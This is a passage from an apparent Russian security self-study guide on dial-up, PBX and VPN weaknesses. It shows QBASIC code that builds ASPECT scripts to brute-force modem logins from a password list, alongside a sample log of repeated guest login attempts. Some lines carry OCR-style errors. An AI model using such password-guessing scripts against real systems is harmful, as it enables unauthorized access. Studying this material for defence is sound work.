Иллюстрированный самоучитель по Secure Web


Уязвимость удаленных соединений, PBX, VOICEMAIL и виртуальных частных сетей - часть 23


LINE INPUT #1, in$

in$ = LTRIM$(in$) + "^M"

PRINT #2, "waitfor " + CHR$(34) + "

Enter Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)

LINE INPUT #1, in$

in$ = LTRIM$(in$) + "^М"

PRINT #2, "waitfor " + CHR$(34) + "

Enter Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)

LINE INPUT #1, in$

in$ - LTRIM$(in$) + "^М"

PRINT #2, "waitfor " + CHR$(34) + "

Enter Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)

LOOP

PRINT #2, "endproc"

Двойная идентификация, неограниченное число попыток


К третьему типу доменов зачастую относятся системы, которые, на первый взгляд, можно принять за системы первого домена. Однако для проникновения в систему третьего домена нужно угадать не только идентификатор пользователя, но и пароль. Поэтому проникновение в такую систему занимает больше времени, чем в системы из рассмотренных выше доменов. Сценарий проникновения в такую систему обычно более сложен, поскольку требует передачи не одной, а двух корректных строк. При этом возможно гораздо больше ошибок. Такой сценарий напоминает рассмотренные выше примеры. Пример поведения системы, относящейся к третьему домену, приведен в листинге 9.5, а программа на языке QBASIC для создания сценария ASPECT — в листинге 9.6.

Листинг 9.5, Пример поведения системы, относящейся к третьему типу домена

XX-Jcl-XX 09:55:08 91ХХХ5551234
С: CONNECT 9600/ARQ/V32/LAPM

Userr.ame: guest

Password: xxxxxxxx

Username: guest

Password: xxxxxxxx

Username: guest

Password: xxxxxxxx

Username: guest

Password: xxxxxxxx

Username: guest

Password: xxxxxxxx

Username: guest

Password: xxxxxxxx

Листинг 9.6. Пример программы на языке QBASIC (файл 5551235.ВАS)

OPEN "5551235.was" FOR OUTPUT AS #2

OPEN "LIST.txt" FOR INPUT AS #1

PRINT #2, "proc main"

PRINT 12, "dial
DATA " + CHR$(34) + "5551235" + CHR$(34)



Начало  Назад  Вперед



Книжный магазин